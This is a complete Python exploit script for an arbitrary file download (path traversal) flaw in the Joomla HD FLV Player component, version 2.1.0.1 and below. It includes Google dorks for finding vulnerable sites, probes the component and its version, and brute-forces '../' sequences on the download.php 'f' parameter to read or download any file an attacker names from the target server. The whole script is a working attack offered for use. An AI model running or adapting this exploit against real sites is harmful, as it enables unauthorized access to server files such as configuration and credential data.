Exploit Com_HDFlvplayer

1. #!/usr/bin/env python
2. #
3. # Exploit Title :  Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
4. #
5. # Exploit Author : Claudio Viviani
6. #
7. # Vendor Homepage : http://www.hdflvplayer.net/
8. #
9. # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
10. #
11. # Dork google 1:  inurl:/component/hdflvplayer/
12. # Dork google 2:  inurl:com_hdflvplayer    
13. #
14. # Date : 2014-11-11
15. #
16. # Tested on : BackBox 3.x/4.x
17. #
18. # Info:
19. #       Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
20. #       The variable "f" is not sanitized.
21. #       Over 80.000 downloads (statistic reported on official site)
22. #
23. #
24. # Video Demo: http://youtu.be/QvBTKFLBQ20
25. #
26. #
27. # Http connection
28. import urllib, urllib2
29. # String manipulation
30. import re
31. # Time management
32. import time
33. # Args management
34. import optparse
35. # Error management
36. import sys
37.  
38. banner = """
39.        _______                      __           ___ ___ ______
40.       |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \\
41.       |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \\
42.       |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \\
43.       |:  1   |                                 |:  |   |:  1    /
44.       |::.. . |                                 |::.|:. |::.. . /
45.       `-------'                                 `--- ---`------'
46.        _______ ___     ___ ___     _______ __
47.       |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.
48.       |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|
49.       |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|
50.       |:  |   |:  1   |:  1   |   |:  |            |_____|
51.       |::.|   |::.. . |\:.. ./    |::.|
52.       `---'   `-------' `---'     `---'
53.  
54.                                         <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d
55.  
56.                                Written by:
57.  
58.                              Claudio Viviani
59.  
60.                           http://www.homelab.it
61.  
62.                              info@homelab.it
63.                          homelabit@protonmail.ch
64.  
65.                      https://www.facebook.com/homelabit
66.                        https://twitter.com/homelabit
67.                      https://plus.google.com/+HomelabIt1/
68.            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
69. """
70.  
71. # Check url
72. def checkurl(url):
73.     if url[:8] != "https://" and url[:7] != "http://":
74.         print('[X] You must insert http:// or https:// procotol')
75.         sys.exit(1)
76.     else:
77.         return url
78.  
79.  
80. def checkcomponent(url,headers):
81.  
82.     try:
83.         req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
84.         sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
85.         print("")
86.     except urllib2.HTTPError:
87.         sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
88.         sys.exit(1)
89.     except urllib2.URLError:
90.         print '[X] Connection Error'
91.  
92. def checkversion(url,headers):
93.  
94.     try:
95.         req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
96.         response = urllib2.urlopen(req).readlines()
97.  
98.         for line_version in response:
99.  
100.             if not line_version.find("<version>") == -1:
101.  
102.                 VER = re.compile('>(.*?)<').search(line_version).group(1)
103.  
104.                 sys.stdout.write("\r[+] Checking Version: "+str(VER))
105.         print("")
106.  
107.     except urllib2.HTTPError:
108.        sys.stdout.write("\r[+] Checking Version: Unknown")
109.  
110.     except urllib2.URLError:
111.         print("\n[X] Connection Error")
112.         sys.exit(1)
113.  
114. def connection(url,headers,pathtrav):
115.  
116.     char = "../"
117.     bar = "#"
118.     s = ""
119.     barcount = ""
120.  
121.     for a in range(1,20):
122.  
123.         s += char
124.         barcount += bar
125.         sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
126.         sys.stdout.flush()
127.  
128.         try:
129.             req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
130.             response = urllib2.urlopen(req)
131.  
132.             content = response.read()
133.  
134.             if content != "" and not "failed to open stream" in content:
135.                 print("\n[!] VULNERABLE")
136.                 print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
137.                 print("")
138.                 print("[+] Do you want [D]ownload or [R]ead the file?")
139.                 print("[+]")
140.                 sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
141.  
142.                 download = set(['d'])
143.                 read  = set(['r'])
144.  
145.                 while True:
146.                     choice = raw_input().lower()
147.                     if choice in download:
148.                         filedown = pathtrav.split('/')[-1]
149.                         urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
150.                         print("[!] DOWNLOADED!")
151.                         print("[!] Check file: "+filedown)
152.                         return True
153.                     elif choice in read:
154.                         print("")
155.                         print content
156.                         return True
157.                     else:
158.                         sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
159.  
160.         except urllib2.HTTPError:
161.             #print '[X] HTTP Error'
162.             pass
163.         except urllib2.URLError:
164.             print '\n[X] Connection Error'
165.  
166.         time.sleep(1)
167.     print("\n[X] File not found or fixed component :(")
168.  
169. commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
170. commandList.add_option('-t', '--target', action="store",
171.                   help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
172.                   )
173. commandList.add_option('-f', '--file', action="store",
174.                   help="Insert file to check",
175.                   )
176. options, remainder = commandList.parse_args()
177.  
178. # Check args
179. if not options.target or not options.file:
180.     print(banner)
181.     commandList.print_help()
182.     sys.exit(1)
183.  
184. print(banner)
185.  
186. url = checkurl(options.target)
187. pathtrav = options.file
188.  
189. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
190.  
191. sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
192. checkcomponent(url,headers)
193. sys.stdout.write("\r[+] Checking Version: ")
194. checkversion(url,headers)
195. sys.stdout.write("\r[+] Exploiting...please wait:")
196. connection(url,headers,pathtrav)